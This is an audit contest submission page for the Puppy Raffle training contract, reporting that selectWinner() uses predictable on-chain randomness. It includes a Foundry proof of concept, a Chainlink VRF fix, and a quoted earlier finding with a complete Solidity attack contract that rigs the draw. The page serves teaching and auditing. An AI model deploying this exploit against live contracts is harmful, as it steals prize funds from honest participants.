Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak on-chain randomness lets a participant choose the winner and the puppy rarity

nexus0ps

Description

The intended behavior: the winner of the raffle (and the puppy rarity) should be unpredictable, so no participant can choose the outcome.

The bug: selectWinner() derives both the winning index and the rarity from values that the transaction sender knows or controls at call time: msg.sender, block.timestamp, and block.difficulty/prevrandao. The function is permissionless and msg.sender feeds the seed, so a participant can compute the result off-chain for candidate blocks and only broadcast the call when it makes them win.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

@> uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

...

@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

}

Risk

Likelihood: High. Any registered player can grind the call (and a block proposer has even stronger control over block.timestamp and prevrandao).

Impact: High. The attacker can deterministically win the 80% prize pool and force a Legendary-rarity NFT, stealing the prize from honest participants.

Proof of Concept

Run forge test --match-test test_H2_weak_randomness_attacker_forces_win. With four players entered, the attacker (a participant) searches for a block.timestamp such that keccak256(attacker, ts, difficulty) % 4 equals its own index, warps to it, and calls selectWinner(). Result: previousWinner == attacker on every run.

// attacker derives the timestamp that makes it win, then calls selectWinner in that slot

uint256 ts = _winningTimestamp(attacker, attackerIndex, players.length, raffleStartTime + duration);

vm.warp(ts);

vm.prank(attacker);

raffle.selectWinner();

assertEq(raffle.previousWinner(), attacker); // passes

Recommended Mitigation

Use a verifiable randomness source (Chainlink VRF) or a commit-reveal scheme, and split selectWinner so it only requests randomness, picking the winner in the callback. Never derive selection from msg.sender, block.timestamp, or block.difficulty.

// Sketch using Chainlink VRF v2

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

// only request randomness here; do NOT pick the winner from on-chain values

requestId = COORDINATOR.requestRandomWords(keyHash, subId, confirmations, callbackGasLimit, 1);

}

function fulfillRandomWords(uint256, uint256[] memory randomWords) internal override {

uint256 winnerIndex = randomWords[0] % players.length; // unpredictable, outside caller control

address winner = players[winnerIndex];

// ... pay winner, mint NFT, reset raffle ...

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!